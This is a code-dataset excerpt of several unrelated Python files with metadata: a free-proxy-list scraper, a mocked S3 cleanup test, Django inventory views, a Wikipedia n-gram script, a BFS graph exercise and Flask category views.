"line_number": 201, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 210, "usage_type": "call"}, {"api_name": "tests.mr_two_step_job.MRTwoStepJob", "line_number": 211, "usage_type": "call"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 234, "usage_type": "name"}, {"api_name": "unittest.skipIf", "line_number": 159, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 160, "usage_type": "attribute"}, {"api_name": "mrjob.fs.gcs.GCSFilesystem", "line_number": 256, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.parse_gcs_uri", "line_number": 272, "usage_type": "call"}, {"api_name": "googleapiclient.errors.HttpError", "line_number": 276, "usage_type": "attribute"}, {"api_name": "googleapiclient.errors", "line_number": 276, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 279, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.parse_gcs_uri", "line_number": 291, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.parse_gcs_uri", "line_number": 306, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs._LS_FIELDS_TO_RETURN", "line_number": 336, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 340, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 436, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs._hex_to_base64", "line_number": 443, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 496, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 497, "usage_type": "call"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 510, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 547, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 556, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 556, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 679, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 695, "usage_type": "call"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 705, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 758, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 758, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 818, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 849, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 866, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 869, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 875, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 878, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 884, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 897, "usage_type": "call"}]} +{"seq_id": "583695165", "text": "from bs4 import BeautifulSoup\nimport requests\nimport re\n\nheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0','Connection': 'close'}\nWEB= {\n 1:'http://www.89ip.cn/index_1.html',\n 2:'https://free-proxy-list.net',\n 3:'https://api.proxyscrape.com/?request=share&proxytype=http&timeout=10000&country=all&ssl=all&anonymity=all',\n }\nv = [2,3] #国外网站\n\n# 请自行更换为自己SSR的端口,然后注释掉None\nPROXIES = {'http':'127.0.0.1:1080',\n 
'https':'127.0.0.1:1080'}\nPROXIES = None\n\ndef color(sign,args=''):\n    colors = {'[-]':'\\033[36m','[+]':'\\033[32m','[!]':'\\033[33m','[x]':'\\033[31m'}\n    if sign in colors:\n        return colors[sign]+sign+args+'\\033[0m'\n    else: return sign+args\n\ndef get_connect(url,proxies,r=''):\n    n = 0\n    while True:\n        try:\n            res = requests.get(url,headers=headers,proxies=proxies,timeout=5)\n            return res.text\n        except:\n            if r: \n                n +=1\n                print('\\r'+color('[!]',str(n)+' Try reconnect WEB %s '%r),end='')\n                if n == 3:\n                    print('\\r'+color('[x]',' reconnect failed WEB %s '%r),end='')\n                    break\n            else : continue\n    return ''\n    \n\n\ndef get_ips(rule,url) ->list:\n    if rule == 1:\n        return r1(rule,url)\n    elif rule ==2:\n        return r2(rule,url)\n    elif rule ==3:\n        return r3(rule,url)\n\ndef msg(r):\n    print('\\r'+color('[-]','Try connect url %s '%str(r)),end='')\n    \n\n\ndef r1(rule,url):\n    msg(rule)\n    ip = []\n    for i in range(1,12):\n        url = 'http://www.89ip.cn/index_'+str(i)+'.html'\n        html = get_connect(url,PROXIES,rule)\n        if html:\n            msg(str(rule)+'.'+str(i))\n            soup = BeautifulSoup(html,'lxml')\n            tr = soup.find(class_='layui-table').find_all('tr')\n            for item in tr[1:]:\n                ip.append(item.find_all('td')[0].string.strip()+':'+item.find_all('td')[1].string.strip())\n    l = len(ip)\n    if l :\n        print(' total= %s'%l)\n        return ip\n    return ''\n\ndef r2(rule,url):\n    msg(rule)\n    html = get_connect(url,PROXIES,rule)\n    if html:\n        msg(rule)\n        soup = BeautifulSoup(html,'lxml')\n        tr = soup.find(id='list').find('tbody').find_all('tr')\n        ip = []\n        for item in tr:\n            ip.append(item.find_all('td')[0].string+':'+item.find_all('td')[1].string)\n        print(' total= %s'%len(ip))\n        return ip\n    return ''\n\ndef r3(rule,url):\n    msg(rule)\n    html = get_connect(url,PROXIES,rule)\n    if html:\n        msg(rule)\n        page = re.search(r'(?<=paste :).*(?=\\')',html).group()\n        url = 'https://textitor.com/paste/'+page+'/plain'\n        html = get_connect(url,PROXIES,2)\n        html = html.split('\\r\\n')\n        print(' total=%s'%len(html))\n        return html[:-1]\n    return ''\n\n", "sub_path": "proxies/rules.py", "file_name": "rules.py", "file_ext": "py", "file_size_in_byte": 2933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 63, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 78, "usage_type": "call"}, {"api_name": "re.search", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "444148434", "text": "import os\nimport pathlib\nimport shutil\nfrom unittest import TestCase\nimport tempfile\nimport boto3\nfrom moto import mock_s3\n\nfrom backend.corpora.lambdas.upload_failures.upload import delete_many_from_s3\n\ns3 = boto3.client(\"s3\")\n\n\nclass TestUploadFailureHandling(TestCase):\n    def setUp(self) -> None:\n        self.tmp_dir = tempfile.mkdtemp()\n        self.h5ad_filename = pathlib.Path(self.tmp_dir, \"test.h5ad\")\n        self.seurat_filename = pathlib.Path(self.tmp_dir, \"test.rds\")\n        self.loom_filename = pathlib.Path(self.tmp_dir, \"test.loom\")\n        self.cxg_filename = pathlib.Path(self.tmp_dir, \"test.cxg\")\n\n        self.h5ad_filename.touch()\n        self.cxg_filename.touch()\n        self.seurat_filename.touch()\n        self.loom_filename.touch()\n\n        self.mock = mock_s3()\n        self.mock.start()\n        self.uuid = \"88aba04c-2d7e-4f76-8b67-071825e8bf46\"\n        self.bucket_name = \"some_Bucket\"\n        os.environ[\"ARTIFACT_BUCKET\"] = self.bucket_name\n        cxg_file = f\"{self.uuid}/remixed.cxg\"\n        h5ad_file = f\"{self.uuid}/remixed.h5ad\"\n        
rds_file = f\"{self.uuid}/remixed.rds\"\n loom_file = f\"{self.uuid}/remixed.loom\"\n s3.create_bucket(Bucket=self.bucket_name)\n\n s3.put_object(Bucket=self.bucket_name, Key=cxg_file, Body=\"words\")\n s3.put_object(Bucket=self.bucket_name, Key=h5ad_file, Body=\"words\")\n s3.put_object(Bucket=self.bucket_name, Key=rds_file, Body=\"words\")\n s3.put_object(Bucket=self.bucket_name, Key=loom_file, Body=\"words\")\n\n resp = s3.list_objects_v2(Bucket=self.bucket_name, Prefix=self.uuid)\n assert len(resp[\"Contents\"]) == 4\n assert resp[\"Contents\"][0][\"Key\"].split(\"/\")[0] == self.uuid\n\n def tearDown(self) -> None:\n self.mock.stop()\n shutil.rmtree(self.tmp_dir)\n\n def test_delete_from_s3_deletes_all_files(self):\n resp = s3.list_objects_v2(Bucket=self.bucket_name, Prefix=self.uuid)\n self.assertGreater(len(resp[\"Contents\"]), 0)\n delete_many_from_s3(self.bucket_name, self.uuid)\n\n resp = s3.list_objects_v2(Bucket=self.bucket_name, Prefix=self.uuid)\n self.assertNotIn(\"Contents\", resp)\n\n def test_delete_from_s3_handles_no_files(self):\n # delete files\n delete_many_from_s3(self.bucket_name, self.uuid)\n resp = s3.list_objects_v2(Bucket=self.bucket_name, Prefix=self.uuid)\n\n self.assertNotIn(\"Contents\", resp)\n # this should not raise any errors\n delete_many_from_s3(self.bucket_name, self.uuid)\n", "sub_path": "tests/unit/backend/corpora/lambdas/upload_failure/test_upload_failure.py", "file_name": "test_upload_failure.py", "file_ext": "py", "file_size_in_byte": 2515, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "boto3.client", "line_number": 11, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "tempfile.mkdtemp", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 18, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 19, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "moto.mock_s3", "line_number": 27, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 49, "usage_type": "call"}, {"api_name": "backend.corpora.lambdas.upload_failures.upload.delete_many_from_s3", "line_number": 54, "usage_type": "call"}, {"api_name": "backend.corpora.lambdas.upload_failures.upload.delete_many_from_s3", "line_number": 61, "usage_type": "call"}, {"api_name": "backend.corpora.lambdas.upload_failures.upload.delete_many_from_s3", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "205154739", "text": "import ast\nimport simplejson\nfrom django.views.generic.base import View\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\nfrom inventory.models import Item, InventoryItem, OpeningStock\nfrom sales.models import SalesItem\nfrom purchase.models import PurchaseItem\n\nclass AddItem(View):\n\n def get(self, request, *args, **kwargs):\n\n return render(request, 'inventory/add_item.html', {})\n\n def post(self, request, *args, **kwargs):\n\n if request.is_ajax():\n status = 200\n ctx_item = []\n item_details = ast.literal_eval(request.POST['item_details'])\n try:\n item = Item.objects.get(code=item_details['code'])\n res = {\n 'result': 'error',\n 'message': 'Item with this code is already exists',\n 
}\n except Exception as ex:\n item, created = Item.objects.get_or_create(code=item_details['code'], name=item_details['name'])\n ctx_item.append({\n 'id': item.id,\n 'name': item.name,\n 'code': item.code,\n 'current_stock': 0,\n })\n res = {\n 'result': 'ok',\n 'item': ctx_item,\n }\n response = simplejson.dumps(res)\n return HttpResponse(response, status=status, mimetype='application/json')\nclass DeleteItem(View):\n def get(self,request,*args,**kwargs):\n item_id = kwargs['item_id']\n item = Item.objects.get(id=item_id)\n sales = SalesItem.objects.filter(item=item)\n purchases = PurchaseItem.objects.filter(item=item)\n if purchases.count() == 0 and sales.count() == 0:\n item.delete()\n else:\n items = Item.objects.all()\n return render(request, 'inventory/items.html', {'items': items, 'message': 'Not able to delete this item'})\n return HttpResponseRedirect(reverse('items'))\n\nclass EditItem(View):\n\n def get(self, request, *args, **kwargs):\n status = 200\n item = Item.objects.get(id=kwargs['item_id'])\n ctx_item = []\n if request.is_ajax():\n ctx_item.append({\n 'name': item.name,\n 'code': item.code,\n 'id': item.id,\n })\n res = {\n 'result': 'ok',\n 'item': ctx_item,\n }\n response = simplejson.dumps(res)\n return HttpResponse(response, status=status, mimetype='application/json')\n return render(request, 'inventory/edit_item.html', {'item_id': item.id})\n\n def post(self, request, *args, **kwargs):\n status = 200\n item = Item.objects.get(id=kwargs['item_id'])\n item_details = ast.literal_eval(request.POST['item'])\n item.name = item_details['name']\n item.save()\n res = {\n 'result': 'ok',\n }\n response = simplejson.dumps(res)\n return HttpResponse(response, status=status, mimetype='application/json')\n\n\nclass ItemList(View):\n\n def get(self, request, *args, **kwargs):\n inventory_items = []\n status = 200\n items = Item.objects.all().order_by('name')\n current_stock = 0\n unit_price = 0\n if request.is_ajax():\n try:\n item_code = request.GET.get('item_code', '')\n item_name = request.GET.get('item_name', '')\n items = []\n if item_code:\n items = Item.objects.filter(code__istartswith=item_code)\n elif item_name:\n items = Item.objects.filter(name__istartswith=item_name)\n \n for item in items:\n try:\n inventory = InventoryItem.objects.get(item=item)\n except:\n inventory = None\n inventory_items.append({\n 'id': item.id,\n 'name': item.name,\n 'code': item.code,\n 'current_stock': inventory.quantity if inventory else 0 ,\n 'unit_price': inventory.unit_price if inventory else 0, \n 'selling_price': inventory.selling_price if inventory else 0, \n })\n except Exception as ex:\n response = simplejson.dumps({'result': 'error', 'error': str(ex)})\n return HttpResponse(response, status = status_code, mimetype = 'application/json')\n res = {\n 'result': 'ok',\n 'inventory_items': inventory_items,\n }\n response = simplejson.dumps(res)\n return HttpResponse(response, status=status, mimetype='application/json')\n \n return render(request, 'inventory/items.html', {'items': items})\n\nclass AddOpeningStock(View):\n def get(self, request, *args, **kwargs):\n return render(request, 'inventory/add_opening_stock.html', {})\n\n def post(self, request, *args, **kwargs):\n if request.is_ajax():\n status = 200\n ctx_item = []\n opening_stock_details = ast.literal_eval(request.POST['opening_stock_details'])\n item = Item.objects.get(code=opening_stock_details['item_code'])\n inventory_item, created = InventoryItem.objects.get_or_create(item=item)\n opening_stock,opening_stock_created = 
OpeningStock.objects.get_or_create(item=inventory_item)\n if opening_stock_created:\n opening_stock.quantity = opening_stock_details['quantity']\n else:\n opening_stock.quantity = opening_stock.quantity + int(opening_stock_details['quantity'])\n opening_stock.item = inventory_item\n opening_stock.unit_price = opening_stock_details['unit_price']\n opening_stock.selling_price = opening_stock_details['selling_price']\n opening_stock.save()\n if created:\n inventory_item.quantity = int(opening_stock_details['quantity'])\n else:\n inventory_item.quantity = inventory_item.quantity + int(opening_stock_details['quantity'])\n inventory_item.unit_price = opening_stock_details['unit_price']\n inventory_item.selling_price = opening_stock_details['selling_price']\n inventory_item.save()\n res = {\n 'result': 'ok',\n }\n response = simplejson.dumps(res)\n return HttpResponse(response, status=status, mimetype='application/json')\n\nclass OpeningStocklist(View):\n def get(self, request, *args, **kwargs):\n opening_stocks = OpeningStock.objects.all()\n return render(request, 'inventory/opening_stock.html', {'opening_stocks': opening_stocks})\n\nclass StockView(View):\n\n def get(self, request, *args, **kwargs):\n stock_items = InventoryItem.objects.all()\n return render(request, 'inventory/stock.html', {\n 'stock_items': stock_items\n })\n \n ", "sub_path": "basic_inventory/inventory/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7207, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.views.generic.base.View", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 23, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects.get", "line_number": 25, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 25, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.get_or_create", "line_number": 31, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 31, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 43, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 44, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.get", "line_number": 47, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 47, "usage_type": "name"}, {"api_name": "sales.models", "line_number": 48, "usage_type": "name"}, {"api_name": "sales.models.SalesItem.objects.filter", "line_number": 48, "usage_type": "call"}, {"api_name": "sales.models.SalesItem.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "sales.models.SalesItem", "line_number": 48, "usage_type": "name"}, {"api_name": "purchase.models.PurchaseItem.objects.filter", "line_number": 49, "usage_type": "call"}, {"api_name": "purchase.models.PurchaseItem.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "purchase.models.PurchaseItem", "line_number": 49, "usage_type": "name"}, {"api_name": "sales.models.count", 
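Every AJAX branch in the views above repeats the same serialize-and-respond pattern with simplejson.dumps plus HttpResponse(..., mimetype=...). Note that the mimetype keyword only exists on Django 1.6 and earlier. A sketch of the equivalent on modern Django, using JsonResponse (the view name is illustrative):

from django.http import JsonResponse
from django.views.generic.base import View

class ItemJsonView(View):
    def get(self, request, *args, **kwargs):
        # JsonResponse serialises the payload and sets the
        # application/json Content-Type header in one step.
        return JsonResponse({'result': 'ok', 'items': []}, status=200)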
"line_number": 50, "usage_type": "call"}, {"api_name": "sales.models", "line_number": 50, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.all", "line_number": 53, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 53, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 54, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 55, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 55, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 57, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.get", "line_number": 61, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 61, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 73, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 74, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 75, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects.get", "line_number": 79, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 79, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 80, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 87, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 90, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.all", "line_number": 95, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 95, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.filter", "line_number": 104, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 104, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 106, "usage_type": "name"}, {"api_name": "inventory.models", "line_number": 110, "usage_type": "name"}, {"api_name": "inventory.models.InventoryItem.objects.get", "line_number": 110, "usage_type": "call"}, {"api_name": "inventory.models.InventoryItem.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "inventory.models.InventoryItem", "line_number": 110, "usage_type": "name"}, {"api_name": "inventory.models", "line_number": 112, "usage_type": "name"}, {"api_name": "inventory.models", "line_number": 117, "usage_type": "name"}, {"api_name": "inventory.models.quantity", "line_number": 117, "usage_type": "attribute"}, {"api_name": "inventory.models", "line_number": 118, "usage_type": "name"}, {"api_name": "inventory.models.unit_price", "line_number": 118, "usage_type": "attribute"}, {"api_name": "inventory.models", "line_number": 119, "usage_type": "name"}, {"api_name": "inventory.models.selling_price", "line_number": 119, 
"usage_type": "attribute"}, {"api_name": "simplejson.dumps", "line_number": 122, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 123, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 128, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 129, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 131, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 133, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 135, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 141, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects.get", "line_number": 142, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 142, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 142, "usage_type": "name"}, {"api_name": "inventory.models.InventoryItem.objects.get_or_create", "line_number": 143, "usage_type": "call"}, {"api_name": "inventory.models.InventoryItem.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "inventory.models.InventoryItem", "line_number": 143, "usage_type": "name"}, {"api_name": "inventory.models.OpeningStock.objects.get_or_create", "line_number": 144, "usage_type": "call"}, {"api_name": "inventory.models.OpeningStock.objects", "line_number": 144, "usage_type": "attribute"}, {"api_name": "inventory.models.OpeningStock", "line_number": 144, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 163, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 164, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 166, "usage_type": "name"}, {"api_name": "inventory.models.OpeningStock.objects.all", "line_number": 168, "usage_type": "call"}, {"api_name": "inventory.models.OpeningStock.objects", "line_number": 168, "usage_type": "attribute"}, {"api_name": "inventory.models.OpeningStock", "line_number": 168, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 169, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 171, "usage_type": "name"}, {"api_name": "inventory.models.InventoryItem.objects.all", "line_number": 174, "usage_type": "call"}, {"api_name": "inventory.models.InventoryItem.objects", "line_number": 174, "usage_type": "attribute"}, {"api_name": "inventory.models.InventoryItem", "line_number": 174, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "528148126", "text": "from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport string\n\n\ndef clean_input(text):\n text = re.sub('\\n+', \" \", text)\n text = re.sub('\\[[0-9]*\\]', \"\", text)\n text = re.sub(' +', \" \", text)\n text = bytes(text, \"UTF-8\")\n text = text.decode(\"ascii\", \"ignore\")\n text = text.split(' ')\n result = []\n for item in text:\n item = item.strip(string.punctuation)\n if len(item) > 1:\n result.append(item)\n return result\n\n\ndef get_ngrams(text, n):\n text = clean_input(text)\n result = []\n for i in range(len(text)-n+1):\n result.append(text[i:i+n])\n return result\n\n\nhtml = urlopen(\"https://en.wikipedia.org/wiki/Steve_Jobs\")\nbsObj = BeautifulSoup(html, \"lxml\")\ncontent = bsObj.find(\"div\", {\"id\": \"mw-content-text\"}).get_text()\nngrams = get_ngrams(content, 2)\nprint(ngrams)\nprint(\"2-grams couont is 
\" + str(len(ngrams)))", "sub_path": "Python/WebScraping/Chapter07/Ngram.py", "file_name": "Ngram.py", "file_ext": "py", "file_size_in_byte": 903, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 8, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 9, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 10, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 16, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 30, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "410808470", "text": "from collections import deque\n\n\ndef from_edge(n, lst):\n new_lst = [[] for i in range(n)]\n for i in lst:\n j = i[0] - 1\n k = i[1] - 1\n new_lst[k].append(i[0] - 1)\n new_lst[j].append(i[1] - 1)\n return new_lst\n\n\ndef bfs(graph, n):\n for start in range(n - 1):\n for finish in range(start, n):\n queue = deque([start])\n dist = [None] * len(graph)\n dist[start] = 0\n while len(queue) != 0:\n v = queue.popleft()\n for i in graph[v]:\n if dist[i] is None:\n queue.append(i)\n dist[i] = dist[v] + 1\n dist_finish = dist[finish]\n if (dist_finish is None) or dist_finish > 2:\n return 'NO'\n return 'YES'\n\n\ntwo_in = open('two.in', 'r')\ntwo_out = open('two.out', 'w')\n\nn, m = map(int, two_in.readline().split())\ngraph = []\nfor i in range(m):\n graph.append(list(map(int, two_in.readline().split())))\ntwo_in.close()\n\ngraph = from_edge(n, graph)\nprint(bfs(graph, n), file=two_out)\ntwo_out.close()\n", "sub_path": "lKSH/day06/two.py", "file_name": "two.py", "file_ext": "py", "file_size_in_byte": 1100, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "55333704", "text": "from flask import request, flash, redirect, url_for\n\nfrom app import db\nfrom app.forms import CategoryForm\nfrom app.utils import page_render, get_form_payload\n\n\ndef categories():\n items = db.categories.find({}).sort(\"name\")\n ctx = {\n 'title': 'Categories',\n 'items': items\n }\n return page_render('categories/list.html', ctx)\n\n\ndef new_category():\n form = CategoryForm(request.form)\n\n if request.method == 'POST' and form.validate_on_submit():\n data = get_form_payload(form)\n db.categories.replace_one({\"name\": data[\"name\"]}, data, upsert=True)\n flash(\"New Category Added!\", 'success')\n else:\n flash(\"Something went wrong!\", 'danger')\n return redirect(url_for('categories'))\n\n\ndef edit_category(id):\n form = CategoryForm(request.form)\n\n if request.method == 'POST' and form.validate_on_submit():\n data = get_form_payload(form)\n db.categories.update_one({\"_id\": id}, {\"$set\": data})\n flash(\"Updated Category!\", 'success')\n else:\n flash(\"Something went wrong!\", 'danger')\n return redirect(url_for('categories'))\n\n\ndef delete_category(id):\n db.categories.delete_one({\"_id\": id})\n flash(\"Category deleted!\", 'success')\n return redirect(url_for('categories'))\n", "sub_path": "app/views/categories.py", "file_name": "categories.py", "file_ext": "py", "file_size_in_byte": 1269, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "app.db.categories.find", "line_number": 9, "usage_type": "call"}, {"api_name": "app.db.categories", "line_number": 9, "usage_type": 
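The all-pairs BFS in two.py above decides whether every pair of vertices lies within distance 2 of each other. An equivalent set-based check, assuming the same 0-based undirected adjacency lists, avoids the repeated traversals: two non-adjacent vertices are within distance 2 exactly when their neighbourhoods intersect.

from itertools import combinations

def diameter_at_most_two(adj):
    neighbours = [set(a) for a in adj]
    for u, v in combinations(range(len(adj)), 2):
        if v in neighbours[u]:
            continue                     # distance 1
        if not (neighbours[u] & neighbours[v]):
            return 'NO'                  # no common neighbour: distance > 2
    return 'YES'

# A path 0-1-2 has diameter exactly 2:
print(diameter_at_most_two([[1], [0, 2], [1]]))   # YES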
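The Flask new_category view above leans on a MongoDB upsert to keep category names unique without a separate existence check. The core of that pattern in isolation (connection string, database name, and the helper's signature are placeholders):

from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017")   # placeholder connection
db = client["appdb"]                                # placeholder database name

def upsert_category(name, **extra):
    # replace_one(..., upsert=True) inserts when nothing matches the filter,
    # so repeated submissions of the same name never create duplicates.
    db.categories.replace_one({"name": name}, {"name": name, **extra}, upsert=True)

upsert_category("books", description="printed matter")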
"attribute"}, {"api_name": "app.db", "line_number": 9, "usage_type": "name"}, {"api_name": "app.utils.page_render", "line_number": 14, "usage_type": "call"}, {"api_name": "app.forms.CategoryForm", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "app.utils.get_form_payload", "line_number": 21, "usage_type": "call"}, {"api_name": "app.db.categories.replace_one", "line_number": 22, "usage_type": "call"}, {"api_name": "app.db.categories", "line_number": 22, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 26, "usage_type": "call"}, {"api_name": "app.forms.CategoryForm", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "app.utils.get_form_payload", "line_number": 33, "usage_type": "call"}, {"api_name": "app.db.categories.update_one", "line_number": 34, "usage_type": "call"}, {"api_name": "app.db.categories", "line_number": 34, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 35, "usage_type": "call"}, {"api_name": 